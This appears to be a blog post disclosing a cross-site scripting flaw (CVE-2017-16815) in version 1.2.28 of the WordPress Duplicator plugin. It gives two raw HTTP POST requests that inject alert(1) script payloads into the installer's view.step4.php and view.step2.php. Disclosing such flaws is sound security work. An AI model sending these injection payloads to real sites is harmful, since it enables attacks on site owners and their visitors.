0

Duplicator Migration (XSS) CVE-2017-16815

I keep finding Cross-site scripting in wordpress plugins, I’m going to have to automate it somehow:).
In this case in a plugin called “Duplicator Migration” version 1.2.28 (https://es.wordpress.org/plugins/duplicator/) which is active in more than 1 million wordpress and is developed by Snapcreek (https://snapcreek.com).
It can explode using two attack vectors:
From the view. step4. php file:

POST
/wordpress//wp-content/plugins/duplicator/installer/build/view.step4.php
HTTP/1.1
Host: localhost
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

url_new="><script>alert(1)</script>demo

From the view.step2.php file:

POST
/wordpress//wp-content/plugins/duplicator/installer/build/view.step2.php
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

logging="><script>alert(1)</script>demo

I’m sorry I didn’t show any capture of the XSS execution but I didn’t need to do it because the Snapcreek developers didn’t ask me to.

adm1n

Leave a Reply

Your email address will not be published. Required fields are marked *